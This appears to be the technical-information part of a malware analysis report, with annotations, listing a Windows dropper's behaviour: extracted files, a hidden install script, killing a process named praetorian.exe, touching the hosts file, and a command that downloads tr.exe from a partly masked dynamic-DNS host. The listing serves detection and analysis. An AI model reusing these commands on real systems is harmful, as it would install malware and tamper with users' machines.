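Technical Information
(The sub-section headings that would state the action for each entry appear to be missing from this listing. The entries are file paths, command lines, a DNS lookup and a window search; paths that occur twice were presumably listed under two different actions.)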
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\sams.exe
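- <DRIVERS>\etc\hosts (the Windows hosts file, assuming <DRIVERS> denotes the system drivers directory; the action taken on it is not stated here)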
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\sams.exe
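- DNS ASK cc##.zapto.org (DNS query; the "##" appears to be a masked part of the hostname, as in the download URL listed further down; zapto.org is a dynamic-DNS domain)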
- ClassName: '' WindowName: ''
- '%TEMP%\7zipsfx.000\sams.exe' http://cc##.zapto.org/tr.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "sams.exe"